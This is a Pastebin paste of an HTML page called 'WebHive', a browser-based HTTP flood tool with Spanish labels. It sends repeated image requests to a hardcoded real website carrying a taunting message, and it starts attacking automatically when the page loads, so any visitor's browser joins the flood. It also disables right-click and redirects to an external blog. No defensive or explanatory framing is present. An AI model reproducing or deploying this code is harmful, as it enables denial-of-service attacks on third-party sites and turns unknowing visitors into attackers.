Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta http-equiv="refresh" content="60;url=http://haddozattack.blogspot.com/">
- <script type="text/javascript">
- //<![CDATA[
- window.__CF=window.__CF||{};window.__CF.AJS={"abetterbrowser":{"config":"none"}};
- //]]>
- </script>
- <style type="text/css">body{background-color:black;background-repeat:repeat;background-position:right;background-attachment:fixed;margin-top:5%;margin-bottom:5%;margin-left:15%;margin-right:15%;font-family:"Courier New",Courier,monospace;color:#808080;}fieldset{border-style:none;margin:10px;}p{margin:0;}input{margin:0;background-color:transparent;border:none;text-align:center;font-family:"Courier New",Courier,monospace;color:#808080;}</style>
- <script type="text/javascript">
- function setAttributeOnload(object, attribute, val) {
- if(window.addEventListener) {
- window.addEventListener("load",
- function(){ object[attribute] = val; }, false);
- } else {
- window.attachEvent('onload', function(){ object[attribute] = val; });
- }
- }
- </script>
- <body onLoad="type()">
- <div id="title" align="center"><font size="+3" color="#FF0000">[ </font><span class="Estilo4"><font size="+3">WebHive</font> </span><font size="+3" color="#FF0000">]</font>
- <br>
- <div id="hive" align="center">
- <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
- <input name="target" id="targetURL" type="text" style="width: 100%;" value="http://rinconmixto.com/"><br><br>
- <font color="#FF0000">[</font>PETICIONES<font color="#FF0000">]</font><br>
- <input id="rps" style="width: 100%;" value="20"><br><br>
- <fieldset>
- <font color="#FF0000">[</font>MENSAJE<font color="#FF0000">]</font><br>
- <input id="message" style="width: 100%;" value="Deja de atacar putito"><br><br>
- </fieldset>
- <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
- PETICIONES <p id="requestedCtr">0</p>
- EXITOSAS <p id="succeededCtr">0</p>
- FALLIDAS <p id="failedCtr">0</p><br>
- <button id="fireButton" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);">Detener</button><br><br><br>
- </div>
- <p align="center">
- <script>
- (function () {
- var fireInterval;
- var isFiring = false;
- var currentTime = new Date()
- var lastSuccess = currentTime.getTime();
- var requestedCtrNode = document.getElementById("requestedCtr"),
- succeededCtrNode = document.getElementById("succeededCtr"),
- failedCtrNode = document.getElementById("failedCtr"),
- targetURLNode = document.getElementById("targetURL"),
- fireButton = document.getElementById("fireButton"),
- messageNode = document.getElementById("message"),
- rpsNode = document.getElementById("rps"),
- timeoutNode = document.getElementById("timeout");
- var targetURL = targetURLNode.value;
- targetURLNode.onchange = function () {
- targetURL = this.value;
- };
- var requestsHT = {}; //
- var requestedCtr = 0,
- succeededCtr = 0,
- failedCtr = 0;
- var makeHttpRequest = function () {
- if ( requestedCtr > 2000) { // Permite No Enviar mas de 1000 peticiones
- clearInterval(fireInterval);
- isFiring = false;
- return;
- } else { lastSuccess = currentTime.getTime();};
- var rID =Number(new Date());
- var img = new Image();
- img.onerror = function () { onFail(rID); };
- img.onabort = function () { onFail(rID); };
- img.onload = function () { onSuccess(rID); }; //
- img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
- requestsHT[rID] = img;
- onRequest(rID);
- };
- var onRequest = function (rID) {
- requestedCtr++;
- requestedCtrNode.innerHTML = requestedCtr;
- };
- var onComplete = function (rID) {
- delete requestsHT[rID];
- };
- var onFail = function (rID) {
- // failedCtr++;
- //failedCtrNode.innerHTML = failedCtr;
- succeededCtr++; //
- succeededCtrNode.innerHTML = succeededCtr;
- delete requestsHT[rID]; //
- };
- var onSuccess = function (rID) {
- succeededCtr++;
- succeededCtrNode.innerHTML = succeededCtr;
- delete requestsHT[rID];
- };
- fireButton.onclick = function () {
- if (isFiring) {
- clearInterval(fireInterval);
- isFiring = false;
- this.innerHTML = "Atacar!";
- } else {
- isFiring = true;
- this.innerHTML = "Detener!";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
- }
- };
- function FireIbero() {
- if (isFiring) {
- clearInterval(fireInterval);
- isFiring = false;
- this.innerHTML = "Atacar!";
- } else {
- isFiring = true;
- this.innerHTML = "Stop flooding";
- fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
- }
- };
- //Cambiar Target y descomentar la funcion FireIbero();
- document.getElementById("targetURL").value = "http://rinconmixto.com/";
- FireIbero();
- })();
- </script>
- </p>
- <div id="footer" align="center">
- <p><font color="#FF0000"># [</font>Lo siento :3<font color="#FF0000">]</p>
- </div>
- <script language=JavaScript>
- <!--
- var message="Funcion Desactivada";
- ///////////////////////////////////
- function clickIE4(){
- if (event.button==2){
- alert(message);
- return false;
- }
- }
- function clickNS4(e){
- if (document.layers||document.getElementById&&!document.all){
- if (e.which==2||e.which==3){
- alert(message);
- return false;
- }
- }
- }
- if (document.layers){
- document.captureEvents(Event.MOUSEDOWN);
- document.onmousedown=clickNS4;
- }
- else if (document.all&&!document.getElementById){
- document.onmousedown=clickIE4;
- }
- document.oncontextmenu=new Function("alert(message);return false" )
- // -->
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement